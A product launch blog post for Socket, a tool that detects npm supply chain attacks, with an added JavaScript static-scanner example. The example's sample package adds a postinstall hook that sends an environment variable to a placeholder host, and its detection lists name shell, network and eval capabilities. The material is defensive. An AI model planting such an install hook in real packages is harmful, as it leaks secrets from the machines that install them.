Socket's mission is to make open source safer.

Introducing Socket
Feross Aboukhadijeh

March 1, 2022


Today we're publicly launching Socket, a platform that protects your most critical apps from software supply chain attacks.

We've been in closed beta for the past seven months, but as of today, Socket is open for anyone to install and try out.

Why existing approaches to supply chain security fall short

Over the past decade, it's become clear that open source software has won. Sharing code freely has made it drastically cheaper and faster to build software – and tech innovation has accelerated as a result. But security has often been an afterthought. New technology spreads because it's useful, not because it's safe.

We are a team of open source maintainers with over 1 billion monthly downloads to our names. Working on the frontlines of open source, we've witnessed firsthand how supply chain attacks have swept across our communities and damaged trust in open source.

In 2021, we saw an unprecedented growth in the scale of open source supply chain attacks. Criminals are exploiting the trust in open source software to carry out brazen attacks that spread destructive malware. From event-stream to ua-parser-js, the attacks keep on coming and they seem to be accelerating.

Meanwhile, the entire security industry is obsessed with identifying known vulnerabilities. There are hundreds of variations of CVE scanners. They all miss the point. Looking for known vulnerabilities is reactive. Vulnerabilities take weeks or months to be discovered. In today's culture of fast development, a malicious dependency can be updated, merged, and running in production in days or even hours.

Socket turns the problem on its head and asks: what if we assume all open source may be malicious? Can we proactively detect indicators of compromised packages? What's the simplest way to mitigate this risk without hurting usability?

What does Socket do?

We are taking an entirely new approach to one of the hardest problems in security in a stagnant part of the industry that has historically been obsessed with just reporting on known vulnerabilities.

Unlike other tools, Socket detects and blocks supply chain attacks before they strike, mitigating the worst consequences. Socket uses deep package inspection to peel back the layers of a dependency to characterize its actual behavior.

[TODO: Insert webpack visualization]

Socket offers these best-in-class features:

  1. Supply Chain Attack Prevention: Prevent compromised or hijacked packages from infiltrating your supply chain by monitoring changes to package.json in real time.
  2. Detect Suspicious Package Behavior: Detect when dependency updates introduce new usage of risky APIs such as network, shell, filesystem, and more.
  3. Comprehensive Protection: Block 60+ red flags in open source code, including malware, typo-squatting, hidden code, misleading packages, permission creep, and more.

Socket looks for indicators present in all of the recent npm supply chain attacks. And we're proactively auditing every package on npm to find these supply chain attacks.

How is Socket different from other code scanning tools?

The market is flooded with vulnerability scanners (which find CVEs in your dependencies) and static analysis tools (which analyze your app code).

These approaches are almost entirely useless at detecting the types of supply chain attacks we've seen exploding in the open source ecosystem.

  • Vulnerability scanners like Snyk or Dependabot merely look up the packages you're using to see if any vulnerabilities have been reported to public CVE databases such as NVD. This is too slow and reactive to stop an active supply chain attack.
  • Traditional static analysis tools are helpful for finding bugs in your app, but they're too noisy to use on thousands of lines of third-party code, and they don't produce actionable results when you're not familiar with the code in question. This isn't the solution to supply chain attacks, either.

Socket, on the other hand, was specifically designed to detect supply chain attacks in your dependencies.

Unlike a traditional security scanner, Socket can actually detect an active supply chain attack and help you to block it. Unlike a traditional static analysis tool, Socket provides actionable feedback about dependency risk instead of hundreds of meaningless alerts.

How does Socket work?

Socket uses "deep package inspection" to characterize the behavior of an open source package. By actually analyzing the package code, Socket can detect when packages use security-relevant platform capabilities, such as the network, filesystem, or shell.

For instance, to detect whether a package uses the network, Socket looks at whether fetch() or Node's net, dgram, dns, http, or https modules are used within the package or any of its dependencies.

This entails running static analysis (and soon, dynamic analysis) on a package – and all of its dependencies – to look for specific risk markers.

In this way, Socket can detect the tell-tale signs of a supply chain attack, including the introduction of install scripts, obfuscated code, high entropy strings, or usage of privileged APIs such as shell, filesystem, eval(), and environment variables.
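As an added example (not Socket's own code), here is a minimal static pass in the spirit of the capability detection described above: it flags the network, filesystem, shell, eval, environment and install-script markers named in this section in a constructed two-version package, and reports which markers a version bump introduces. The module lists, regexes and sample package are assumptions for illustration; a production tool would parse an AST and walk the full dependency tree.

```javascript
// Added example (not Socket's own code): a minimal static "deep package inspection"
// pass flagging the markers the post lists: network, filesystem, shell, eval, env
// access and install scripts. Real tooling parses an AST and walks all dependencies.
const CAPABILITY_MODULES = {
  network: ['net', 'dgram', 'dns', 'http', 'https', 'http2', 'tls'],
  filesystem: ['fs', 'fs/promises'],
  shell: ['child_process'],
};
// Matches require('x'), require("node:x"), import ... from 'x' and import('x').
const MODULE_REF = /(?:require\s*\(|import\s*\(|\bfrom)\s*['"](?:node:)?([\w\/]+)['"]/g;
function scanSource(source) {
  const found = new Set();
  for (const m of source.matchAll(MODULE_REF)) {
    for (const [capability, modules] of Object.entries(CAPABILITY_MODULES)) {
      if (modules.includes(m[1])) found.add(capability);
    }
  }
  if (/\bfetch\s*\(/.test(source)) found.add('network');
  if (/\beval\s*\(|\bnew\s+Function\s*\(/.test(source)) found.add('eval');
  if (/\bprocess\.env\b/.test(source)) found.add('env');
  return found;
}
// npm runs these lifecycle scripts automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
function scanPackage(pkg) {
  const found = new Set();
  const scripts = pkg.manifest.scripts || {};
  if (INSTALL_HOOKS.some((hook) => hook in scripts)) found.add('install-script');
  for (const source of Object.values(pkg.files)) {
    for (const marker of scanSource(source)) found.add(marker);
  }
  return [...found].sort();
}
// Markers a dependency update introduces: the signal to judge the update on.
function newCapabilities(oldPkg, newPkg) {
  const before = new Set(scanPackage(oldPkg));
  return scanPackage(newPkg).filter((marker) => !before.has(marker));
}
// Constructed sample: a padding utility whose next version adds a postinstall hook that phones home.
const padV1 = {
  manifest: { name: 'example-pad', version: '1.1.0', scripts: { test: 'node test.js' } },
  files: { 'index.js': 'module.exports = (s, n) => s.padStart(n);' },
};
const padV2 = {
  manifest: { name: 'example-pad', version: '1.2.0', scripts: { test: 'node test.js', postinstall: 'node setup.js' } },
  files: {
    'index.js': padV1.files['index.js'],
    'setup.js': "const https = require('node:https');\nhttps.get('https://example.invalid/ping?ci=' + process.env.CI);",
  },
};
```

Calling `newCapabilities(padV1, padV2)` yields the three markers the update introduced, which is exactly the change a reviewer would want surfaced before merging the bump.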

Who built Socket?

Every member of the Socket team is an open source maintainer. That's why we care so much about this problem.

Most security software is sold to executives, so it tends to suck to actually use. In the best case, it gets purchased and sits around on a shelf bothering – and protecting – no one. In the worst case, it prevents developers from getting things done.

As developers ourselves, we understand there is an inherent tension between usability and security, but we refuse to compromise one for the other. We're driven to protect the open source ecosystem with usable security.

Ultimately, that's the only way to make open source safe for everyone.

Try it out today

Today, our early customers are using Socket to protect their apps from typo-squatting attacks, with more features coming later in March. If you're interested in trying out Socket, you can install the GitHub App in less than 5 minutes. Feel free to reach out to us as well if you'd like to chat and get a more in-depth demo.

We have a lot of exciting product releases planned for the coming year – if you'd like to stay in the loop, you can subscribe to updates below.

P.S. We're hiring at Socket! Check out our jobs page if you're interested in working to secure the software supply chain.

